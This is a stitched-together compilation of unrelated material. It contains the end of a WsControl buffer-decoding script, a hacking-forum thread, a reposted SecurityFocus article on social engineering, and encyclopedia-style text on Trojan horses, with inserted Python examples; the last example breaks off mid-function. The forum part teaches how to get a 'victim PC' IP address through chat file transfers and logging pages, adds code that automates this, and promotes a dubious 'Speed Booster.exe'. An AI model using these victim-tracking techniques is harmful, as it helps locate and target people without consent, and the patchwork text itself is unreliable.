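    return [dword_as_ip(s, 0) for s in split_structs(parse_dump(dump), count)]

def decode_tcpip(interface_dump, active_dump, extended_dump):
    """Use the counts from Get Interface Information to carve the other two buffers."""
    n_active, n_extended = interface_counts(interface_dump)
    return {"active": active_addresses(active_dump, n_active),
            "extended": extended_destinations(extended_dump, n_extended)}

if __name__ == "__main__":
    for key, rows in decode_tcpip(INTERFACE_DUMP, ACTIVE_DUMP, EXTENDED_DUMP).items():
        print(key, rows)
```

Run as a script it prints the two decoded lists. The interface counts come out as (2, 7), which is why the Extended buffer splits into 0x30-byte pieces and the Active buffer into 0x18-byte pieces; the offset check in parse_dump catches a dump that has been retyped with a line missing.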


Author
------

Written by Alfons Hoogervorst. He can be contacted at
.

If you have additional information about any of the topics in this document,
especially about WsControl(), send me a note. Comments, suggestions, and
any useful hints are welcome too.

Alfons works as a freelance developer, specializing in low-level programming.


Legalese
--------

You're allowed to distribute this file for free, without paying me any fee.
However, the following sections should remain unmodified in this document:

Introduction, Author, Legalese, Copyright.

The information in this document is provided AS IS, without any warranties
or guarantees. As a human being, he expressedly reserves his rights to err:
"If its meaning doesn't manifest, then: put it to rest!"

SAUV: Hmm... nice.
Check the Yahoo exploits if you want to hack emails using chatting and IPs.

Ethics Of Hacking :

I'm shocked that this forum is here. It's known that anyone joining this website should be a hacker and should have a basic knowledge of hacking, but still, for the intermediates and beginners:
Hacking can be done in millions of ways: phishing, bruteforcers, keyloggers and what not.
Do you know that there are millions of ways of defacing a website? But the must of all this is that you should have a fast internet connection of minimum 10 Mbps.
I know in India legally it's not possible, but illegally it is.
The best way to achieve it is to use some speed enhancers. I've uploaded a speed enhancer here; just download it and make your computer/server run twice its original speed.

Speed Booster.exe
Description: This is a cool speed booster. With any basic speed that you have, it will enhance it to 10 Mb/s (10 Mbps).
Filename: Speed Booster.exe
Filesize: 44.01 KB

SAUV: Dude, it's not installing. The error message is "speed booster.exe is not a valid win32 application".
What to do now???

Hey bro, this Speed Booster has been specially designed for a limited set of IP addresses. These IP addresses include all the active members of this community. Most of the software available here works on the same rule.

There is a group called Czar Hackerz. Just be a part of this and fill up the forums.
We are ready to help you.
As soon as you send 10 new posts in any forum we shall include your IP address.

How To Get IP Address Of Victim PC :

Find an msn messengers contact IP address

The only way I know to do that is to send the contact a file while he is online: send him/her a photo or something else. While your friend receives the file, a peer-to-peer connection is open between you. Make sure you have a DOS prompt open (Start > Programs > MS-DOS Prompt) and type the command netstat while sending the file (netstat -n shows the addresses as numbers instead of resolved host names). You will see a list of all the connections your computer has at that time; one of them must be your friend who is receiving the file. If I hear about another, easier way to get it without sending files, be sure I will post it here.

Find an IP through mIRC chat channels

There is the /dns nickname command in IRC, but some people use proxies or shells and you can't see their real address. How do you know if the user uses a web shell or a proxy? Well, guess that yourself while looking at the IP you got from the /dns nickname command. Make sure you check out IRC Scanner v1.0 by RG in our programming section and in the IP scanners section; it's the best and fastest way to scan the users in IRC channels.

Get your friends IP address by sending them to your page

Build a simple site on GeoCities or anywhere else, then go to http://www.stats4all.com and create an account. They provide free website statistics. Add their code to your site and tell your friend to check out a cool page you just made. When he visits the page his IP will be logged at stats4all.com, so after your friend visits your page check your stats on stats4all.com and you will find the last 5 visitors at the left of the stats page, your friend's IP included.
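As an added example (not from the post above), here is the netstat step done the way a practitioner would actually do it: take one snapshot of `netstat -n` before you send the file and one while the transfer is running, then diff them, so your existing messenger, web and loopback connections drop out and only the connection that appeared for the transfer remains. The netstat output below is constructed sample data in the Windows layout, with made-up addresses from the RFC 5737 documentation ranges; the LAN/loopback filter is an assumption about what you want to ignore and can be switched off when the contact is on your own network.

```python
import ipaddress
import re

# Constructed sample `netstat -n` output (Windows layout). Addresses are made up;
# the "Internet" side uses RFC 5737 documentation ranges.
BEFORE_TRANSFER = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    192.168.1.5:1030       198.51.100.10:5050     ESTABLISHED
  TCP    192.168.1.5:1031       198.51.100.20:80       TIME_WAIT
  TCP    127.0.0.1:1040         127.0.0.1:1041         ESTABLISHED
"""

DURING_TRANSFER = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    192.168.1.5:1030       198.51.100.10:5050     ESTABLISHED
  TCP    192.168.1.5:1052       203.0.113.77:6891      ESTABLISHED
  TCP    192.168.1.5:1053       192.168.1.9:445        ESTABLISHED
  TCP    127.0.0.1:1040         127.0.0.1:1041         ESTABLISHED
  UDP    192.168.1.5:137        *:*
"""

_CONN = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")

# Peers on these networks are on your own machine or LAN, not out on the Internet.
_LOCAL_NETS = [ipaddress.ip_network(n) for n in
               ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
                "192.168.0.0/16", "169.254.0.0/16")]

def split_endpoint(endpoint):
    """'203.0.113.77:6891' -> ('203.0.113.77', '6891'); also handles '[::1]:135' and '*:*'."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port

def parse_netstat(text):
    """Return a set of (proto, local, remote, state) tuples from `netstat -n` output."""
    conns = set()
    for line in text.splitlines():
        m = _CONN.match(line)
        if m:
            proto, local, remote, state = m.groups()
            conns.add((proto, local, remote, state or ""))
    return conns

def is_local_peer(ip):
    """True for loopback, RFC 1918 and link-local peers, and for '*' or names."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return any(addr in net for net in _LOCAL_NETS)

def new_remote_peers(before, during, ignore_lan=True):
    """IPs of ESTABLISHED TCP connections that appeared between the two snapshots."""
    appeared = parse_netstat(during) - parse_netstat(before)
    peers = set()
    for proto, _local, remote, state in appeared:
        ip, _port = split_endpoint(remote)
        if proto != "TCP" or state != "ESTABLISHED":
            continue
        if ignore_lan and is_local_peer(ip):
            continue
        peers.add(ip)
    return peers

if __name__ == "__main__":
    print(new_remote_peers(BEFORE_TRANSFER, DURING_TRANSFER))
```

With the sample snapshots the only new Internet-side peer is 203.0.113.77; the new SMB connection to 192.168.1.9 is hidden by the LAN filter unless you pass ignore_lan=False. Keep in mind that a dynamic address identifies the contact only until their ISP hands them a new one.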

SAUV: Well, even netstat commands can be used if you are chatting with him.
2. But a person uses a dynamic IP address, i.e.
his IP address will be changed by his ISP next time he is online.

That means I have to track his IP address all the time when he comes online???
3. You use netstat -n
4. With the netstat -n command will we get his ISP? I mean the permanent one...

---------------------------------------------

Social Engineering :

Source: http://www.securityfocus.com/infocus/1860

The purpose of this article is to go beyond the basics and explore how social engineering, employed as technology, has evolved over the past few years. A case study of a typical Fortune 1000 company will be discussed, putting emphasis on the importance of education about social engineering for every corporate security program.
Top five hacking moments on film
To break the ice, let's start this article by looking at this author's top five favorite hacking moments in modern movies, all of them quite old-school to emphasize a point:

5. Independence Day: Using an old space ship as cover for two humans to infiltrate the alien mother ship and upload a virus to destroy it.
4. Hackers: Dumpster diving in the target company's trash in order to obtain financial data from printouts.
3. War Games: Password cracking the military computer system by studying its creator.
2. Ferris Bueller's Day Off: Faking a grandmother's death to get Ferris's girlfriend excused from school through multiple phone calls and answering machine recordings.
1. Star Wars: R2-D2 gaining access to the death star main computer and shutting down the garbage dispensers (remember the com link!).

Question: Which of the above hacks did not employ a social engineering technique? Answer: None of the above.

In Independence Day, the characters spoofed the mother ship with a physical Trojan horse. In Hackers, dumpster diving can't be achieved with a computer. In War Games, Matthew Broderick's character studied his target before attempting to crack the password, and then in Ferris Bueller's Day Off, his phone scam was sheer brilliance. You've got to love the low-tech approach. And although it would seem R2-D2's hack was entirely technical, remember he had to sneak into the room with the computer access point before achieving his goal.

The lesson here is that social engineering is a major component of hacking in both fictional and real scenarios. By merely trying to prevent infiltration on a technical level and ignoring the physical-social level, we are leaving ourselves wide open to attack.
Social engineering redefined
Bruce Schneier, author of Secrets & Lies: Digital Security in a Networked World, reminds us that social engineering, a.k.a. "socio-technical attacks", is really all about the human aspect, and that means trust. Kevin Mitnick, renowned and reformed hacker, in his book The Art of Deception, goes further to explain that people inherently want to be helpful and therefore are easily duped. They assume a level of trust in order to avoid conflict. It's all about "gaining access to information that people think is innocuous when it isn't," and then using that information against the real target. We are the weakest link in the security chain. This point cannot be overemphasized. People are the weakest link, not technology.

This article is a followup to a social engineering series written several years ago. The goal is to go beyond the basics and explore how social engineering has been employed as technology has evolved over the past few years. For further information on social engineering, see this author's previous article, "Social Engineering Fundamentals, Part I: Hacker Tactics" and "Part II: Combat Strategies."

Since social engineering involves the human element of any attack, it's important to get into the head of the hacker and understand her motivation. Historically, the motivation has been intellectual challenge, bragging rights, access to sensitive information, simple curiosity, or our biggest fear: malicious intent. By knowing why we are at risk, we can better protect ourselves from the foolish things we do that allow social engineers to exploit us.

Targets of an attack can be both physical and psychological. Social engineering attacks will occur in person, over the phone, and online. No medium is safe from them. Individuals are targets for rampant identity theft and businesses fall prey to exploitation of a variety of holes. Weak passwords are always a target, as are file backdoors and improperly set permissions. That's the obvious stuff. What's changed over the past few years is that borders progressively don't matter. Words like "cyberterrorism" have become mainstream and we now even have an FBI-organized counter-terrorism posse of hackers waiting to pounce in the event of a massive online terrorist attack. Even some of the best hackers will use social engineering techniques against a victim (in combination with a highly technical approach) because it's simple, easy, and very effective. Social engineering is everywhere.
Types of attacks
The biggest change over the past four years, since our original article series on SecurityFocus, is the exponential growth of e-commerce. Browsers and the use of the SSL (Secure Sockets Layer) protocol are now the norm for viewing everything from financial data to party invitations over webmail. Those of us who still use pine for email are in the minority. The types of attacks we see today tend to be targeted more toward web applications. Hidden programs running on web sites and hidden programs in email attachments opened through webmail programs can host all kinds of dangers.

Browser add-ons can mask all kinds of rogue programs. DDoS (Distributed Denial of Service) attacks are still quite common and are a royal pain to combat, but they're not increasing in number the way identity theft is. Malware continues to plague everyone, although the widespread viruses of the nineties seem to have taken a back seat to browser back doors, most often installed as drive-by spyware when visiting a website. VoIP (Voice over Internet Protocol), being the new buzzword, has also attracted attackers, with results varying from authentication failures to crashing phones.

So how does social engineering fit into the picture? Before employing some of the techniques noted above, some preliminary social engineering can be incredibly fruitful. Footprinting - the art of gathering information (or pre-hacking), is like a robber casing a bank. It's commonly done to research a predetermined target and determine the best opportunities for exploitation. Footprinting can include anything from phone calls from a role playing person asking seemingly innocent questions to physically mapping out buildings and data centers. And footprinting is a major social engineering component of a choreographed attack.
Phishing trips
Phishing is the most common form of social engineering online, and most notably includes email spoofs. It's a rare day where the average email inbox doesn't include some sort of spoof. Today, eBay, Paypal and Citibank are the most common targets. Phishing itself is not new, but the frequency has increased over the past few years. The user receives email claiming that his Paypal account information needs updating and the email includes a link that sends the user to a fake web site where he is instructed to enter his password to update his information. The web site then stores the real passwords for use in identity theft attacks against the real Paypal site. For more information about phishing, see Scott Granneman's article, "Phishing For Savvy Users."

The best response is to delete these messages before even looking at them, just in case a rogue program might be launching in the background. However, to be sure a genuine message from a site like Citibank or eBay isn't being ignored, the best course of action is to log into their main site login, by typing http://www.ebay.com/, and then check the account for a record of the email or of any sort of problem. Due to the nature of phishing, you can't reliably click on a link in your email anymore and be sure it's what it appears.

In the case of eBay, go to "my messages" or "my ebay" to verify the authenticity of the email sent. Paypal doesn't have this feature yet. It's also easy to send a quick note to spoof@ebay.com or spoof@paypal.com, forwarding the message in question, and they will respond quickly as to its authenticity. eBay recently adapted their email sent to users to include usernames in the subject and body of the message, to emphasize authenticity. In general though, the best practice is to assume the email is a fake and remove it permanently from any email archives.
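The advice above is to type the site's address yourself rather than follow a link in the mail. As an added example that is not part of the article, the following code shows what a filter (or a careful reader) actually checks to decide that a link is not what it appears to be: the host behind the link against a set of expected domains (assumed here to be the three sites the article names), the user@host trick, a raw IP address as host, and visible link text that names a different site than the href. The HTML mail body is a constructed sample, and the two-label "registered domain" rule is a simplification that works for .com targets but not for co.uk-style suffixes.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains the article names as the usual phishing targets; assumed as the trusted set.
TRUSTED_DOMAINS = {"ebay.com", "paypal.com", "citibank.com"}

# Constructed sample mail body: two spoofed links, one genuine link, one legitimate subdomain.
SAMPLE_EMAIL = """
<p>Your account needs updating. Please visit
<a href="http://www.paypal.com.account-update.example.net/login">http://www.paypal.com/</a>
or <a href="http://www.paypal.com@203.0.113.5/">click here</a> within 24 hours.</p>
<p>Visit <a href="https://www.ebay.com/">My eBay</a> or
<a href="https://signin.ebay.com/ws/eBayISAPI.dll">https://www.ebay.com/</a></p>
"""

_LOOKS_LIKE_URL = re.compile(r"^(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}(?:/\S*)?$", re.I)

class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in the body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = [dict(attrs).get("href") or "", ""]
    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data
    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self.links.append((self._current[0], self._current[1].strip()))
            self._current = None

def extract_links(html):
    parser = _LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.links

def registered_domain(host):
    """Last two labels of a host name: 'signin.ebay.com' -> 'ebay.com'.
    Adequate for the .com targets here; a real filter uses the public suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def classify_link(href, text):
    """Reasons a link should not be followed from the mail; an empty list means it passes."""
    reasons = []
    parts = urlsplit(href)
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https"):
        reasons.append("scheme %r is not http(s)" % parts.scheme)
    if parts.username is not None:
        reasons.append("user@host trick: the browser ignores everything before '@'")
    if _is_ip_literal(host):
        reasons.append("raw IP address instead of a host name")
    elif registered_domain(host) not in TRUSTED_DOMAINS:
        reasons.append("host %r is not a trusted domain" % host)
    if _LOOKS_LIKE_URL.match(text):
        shown = urlsplit(text if "://" in text else "http://" + text).hostname or ""
        if registered_domain(shown) != registered_domain(host):
            reasons.append("visible text says %r but link goes to %r" % (shown, host))
    return reasons

def audit_email(html):
    """[(href, reasons)] for every link in the mail body."""
    return [(href, classify_link(href, text)) for href, text in extract_links(html)]

if __name__ == "__main__":
    for href, reasons in audit_email(SAMPLE_EMAIL):
        print("OK  " if not reasons else "BAD ", href, reasons)
```

The subdomain spoof is caught because the registered domain of www.paypal.com.account-update.example.net is example.net, not paypal.com, and the user@host form is caught because urlsplit reports the real host (203.0.113.5) separately from the decoy in front of the "@". A genuine link on a legitimate subdomain such as signin.ebay.com passes.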
Case study - Company X
To illustrate the importance of incorporating social engineering education into a corporate security program, here is an overview of the security for a fairly typical high-tech company, called "Company X" for the purposes of this article. Company X, a multi-billion dollar organization, spends millions on hardware and security, but in reality it only does the minimum of what is necessary to keep its assets secure. Such is the life of an average security program in the competitive market of high-tech.


Company X's physical (building) security includes badges for all employees, locked doors, security guards, and restricted access. Employees, however, tend to hold doors open for others and don't tend to check the photos on IDs when doing so. Dumpster areas are gated but unlocked, leaving them open to potential dumpster divers. Phone security is standard, allowing internal transfers and outgoing calls with blocked IDs. Remote access is through a VPN with SecurID, the use of which requires permission from a superior, and inactive accounts are suspended within 30 days. Wireless access points in the buildings also fall under these restrictions.

As for hardware, remote drives are used, but employees are instructed not to store confidential information on the drives. Laptops are common, but only roughly 30% of users lock them with the provided cables. Shared drives on the internal network are protected by group permissions. On the system level, the company runs weekly virus scans. Security teams have reduced administrative rights on machines so employees can't install rogue programs. Password requirements are fairly standard, requiring a variety of characters, changed every few months.

Software comes standard for each machine. Screen savers are password protected, but not always locked. Most machines are open to Internet access, with the exception of some site blocking. Passwords can be saved in browsers, however. Email suffers from frequent server problems, webmail is not always secure, and IM use internally is rampant.

In the areas where social engineering prevention could be most useful, barely anything is done. When an employee is on the phone with Help Desk support, the employee's number comes up on phone but no standard authentication questions are asked by either the Help Desk staff or the employee being helped. CallerID spoofing would be a very simple way to get a password reset. Security training is available for home network usage and basic encryption, but departments differ in their use of these tools. No standard training is given for new employees, leaving the organization open to staff passing around a wide range of bad habits.

Sadly, Company X's security is not much better than it was ten years ago and it has barely evolved with the times. It's tough enough to keep up with the latest technology, patches, and filters with corporate budget cuts. Security teams tend to get the short end of the stick until the company suffers a major outage from an attack. Since various attacks became more public in recent years, everybody and their brother company claims to be secure - but the reality is that most companies are like Company X, struggling to maintain a basic level of security.
Countermeasures
What could Company X and others like it do to prevent attacks on the social engineering level? On the technical side, they must continue to install spam filters and update software patches, as a bare minimum. Making cryptography standard for email and web access, not allowing passwords to be saved in browsers, and changing to an internal messaging program are key technology steps. The next step would be to develop an incident reporting and tracking program. This way they can discover additional holes in their program and attend to those holes. Incident reporting won't necessarily catch the intruders, but it helps to find ways to deter them.

Not to bite the hand that feeds us, but as Mitnick says, "anyone who thinks that security products alone offer true security is settling for the illusion of security." Therefore, training cannot be emphasized enough. New employee training, repeat training, regular updates, and fun security tips can keep the security education process fresh and lively. Some companies now use t-shirts and other paraphernalia to advertise security practices and remind employees to beware of suspicious phone calls and other potential phishing attempts. Help Desk staff need to have proper authentication procedures for all support calls. Security personnel should be adequately trained as well, and screened beyond regular employees in case they themselves pose a risk to the company.

Security policies used to have more bark than bite, but these days it's now common to put more teeth into them. Corporate policies, standards, guidelines, and so on cover a wide range of areas but the important thing is to develop them with growth and accountability in mind. Topics that should be covered in corporate policies include information sensitivity, password protection, ethics, acceptable use, email, database credentials, extranet usage, VPN security, and server security.

Also, pay attention to what's happening on the national and international level as far as ID theft laws and database protection are concerned. New bills are being developed to make identity theft more difficult through the greater protection of personal information.
The bottom line
Unfortunately, the reality is that intruders rarely get caught, and even when they are caught, the penalties haven't traditionally been stiff. Shouldn't we be more worried about serial murderers running loose than a bunch of computer geeks? Seriously though, identity theft, corporate espionage and cyber-terrorism are here to stay, so the bottom line lies in making a commitment to combating potential attackers.

At Company X the buck ultimately stops with the CIO, who must commit to improving their security program before they lose a significant amount of money and intellectual property to a major attack. That requires committing both the financial and people resources to the problem, and not dropping education and training from the budget. As individuals, we must commit to increasing our awareness of the risks we face and the potential openings we create for social engineers to fool us. The key, according to Schneier, lies in, "securing the interaction between the data and the people."

In any good security program, a realistic balance must be reached. There's always a fine line between an "atmosphere of paranoia" and a productive environment. However, if we err on the side of stronger security, knowing human error is the problem, we'll be more likely to achieve success. Just remember that we, the people, are the weakest link and, as Mitnick writes, "Don't be gullible!"

Trojan!!

Hacking Via Trojan!! :

Trojan ( bad ) Beware !!!!
Trojan horse well this term has many meanings .
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.

Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.

Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. Even when a trojan is copied or distributed widely, each new victim must still run it. Their virulence is therefore of a different nature, depending on successful social engineering rather than on flaws in a computer system's security design or configuration.
Definition

A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.

In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of computer security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report'; Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Systems Division, Hanscom AFB, Oct 1972), which credits Daniel J Edwards, then of NSA, for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically set up a hidden server to which an attacker with the matching client can then connect. Modern ones are polymorphic, inject themselves into other processes, disable protection software, and are easy to use without authorization; this is what makes them abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is often configured by default to hide filename extensions from the user, the Trojan horse's extension might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different, benign program or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks, possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both introduced a vulnerability on victim computers and acted as spyware, reporting back to a central server from time to time whenever one of the music CDs carrying it was played on a Windows computer.
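As an added example that is not from the original text, here is the extension check that follows from the 'Readme.txt.exe' discussion: it reports what the user would see with extensions hidden, and flags any attachment whose real extension is one of the executable types listed above, singling out the case where a document-looking extension sits in front of it. The executable extensions are the ones the text lists; the set of document extensions treated as decoys, and the approximation of Explorer's hiding rule, are assumptions.

```python
import os

# Executable extensions the text lists, and document-looking decoys (assumed list).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".pif"}
DOCUMENT_EXTS = {".txt", ".doc", ".pdf", ".jpg", ".gif", ".htm", ".zip"}

def displayed_name(filename):
    """Approximates Explorer with 'Hide extensions for known file types' on:
    the final known extension is dropped, so 'Readme.txt.exe' shows as 'Readme.txt'."""
    stem, ext = os.path.splitext(filename)
    return stem if ext.lower() in EXECUTABLE_EXTS | DOCUMENT_EXTS else filename

def classify_attachment(filename):
    """Return (verdict, what the user would see). Verdicts: 'ok', 'executable', or
    'document-decoy executable' when a document extension hides in front of the real one."""
    name = filename.strip()
    stem, ext = os.path.splitext(name)
    shown = displayed_name(name)
    if ext.lower() not in EXECUTABLE_EXTS:
        return "ok", shown
    inner = os.path.splitext(stem)[1].lower()
    if inner in DOCUMENT_EXTS:
        return "document-decoy executable", shown
    return "executable", shown

def triage(filenames):
    """Attachments a mail gateway should hold back: (real name, verdict, name as displayed)."""
    held = []
    for name in filenames:
        verdict, shown = classify_attachment(name)
        if verdict != "ok":
            held.append((name, verdict, shown))
    return held

if __name__ == "__main__":
    # Constructed sample attachment names.
    for row in triage(["Readme.txt.exe", "notes.txt", "waterfalls.scr.exe", "holiday.JPG"]):
        print(row)
```

The comparison is done on the lowercased extension, so 'invoice.PDF.scr' is caught the same way as 'invoice.pdf.scr'; the displayed name is returned alongside the verdict because that is the string the user will quote when they report what they clicked.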

Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are:
erasing or overwriting data on a computer;
encrypting files in a cryptoviral extortion attack;
corrupting files in a subtle way;
uploading and downloading files;
allowing remote access to the victim's computer (a RAT, remote administration tool);
spreading other malware, such as viruses (in this case the Trojan horse is called a 'dropper' or 'vector');
setting up networks of zombie computers in order to launch DDoS attacks or send spam;
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware);
taking screenshots;
logging keystrokes to steal information such as passwords and credit card numbers (a keylogger);
phishing for bank or other account details, which can be used for criminal activities;
installing a backdoor on a computer system;
opening and closing the CD-ROM tray.

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.

Precautions against Trojan horses

Trojan horses can be protected against through end-user awareness. Trojan horses can cause a great deal of damage to a personal computer, but even more damaging is what they can do to a business, particularly a small business that usually does not have the same anti-virus capabilities as a large business. Since a Trojan horse is hidden, it is harder to protect yourself or your company from them, but there are things that you can do.

Trojan horses are most commonly spread through e-mail, much like other common malware. The difference, of course, is that a Trojan horse is disguised as something legitimate. The best ways to protect yourself and your company from Trojan horses are as follows:

1. If you receive e-mail from someone that you do not know, or you receive an unknown attachment, never open it right away. As an e-mail user you should confirm the source. Some attackers are able to steal address books, so seeing e-mail from someone you know does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come with an anti-virus program that scans attachments before they are opened. If your client does not come with this, it would be best to purchase one or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on; that way, if you forget to update your software you can still be protected from threats.

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense “close the hole” that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.

Methods of Infection

The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.

A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.
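One concrete way to act on the "open ports" point is to compare what a machine is actually listening on with what it is supposed to expose. The following is an added example and not code from the original post: it parses Windows `netstat -an` output (a constructed sample is embedded below) and reports listening sockets that are not on an assumed allowlist, so a surprise port opened by a backdoor's hidden server stands out. The allowlist and the sample listing are assumptions chosen for the demo.

```python
"""Audit a Windows `netstat -an` listing against an allowlist of expected listeners.

Added example, not part of the original post. The netstat text and the
allowlist below are constructed for the demo.
"""
import re

# Constructed sample of `netstat -an` output in the Windows layout.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1042      198.51.100.7:80        ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:31337          *:*
"""

# Assumed allowlist: the (protocol, port) pairs this host is meant to expose.
EXPECTED = {("TCP", 135), ("TCP", 445), ("UDP", 137)}

# One netstat row: proto, local addr:port, foreign addr, optional state (UDP has none).
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def listening_sockets(netstat_text):
    """Return the set of (proto, local_addr, port) that accept traffic.

    TCP sockets count only in LISTENING state; UDP sockets carry no state
    in netstat, so every bound UDP socket counts.
    """
    found = set()
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header lines and blank lines
        proto, addr, port, _foreign, state = m.groups()
        if proto == "TCP" and state != "LISTENING":
            continue
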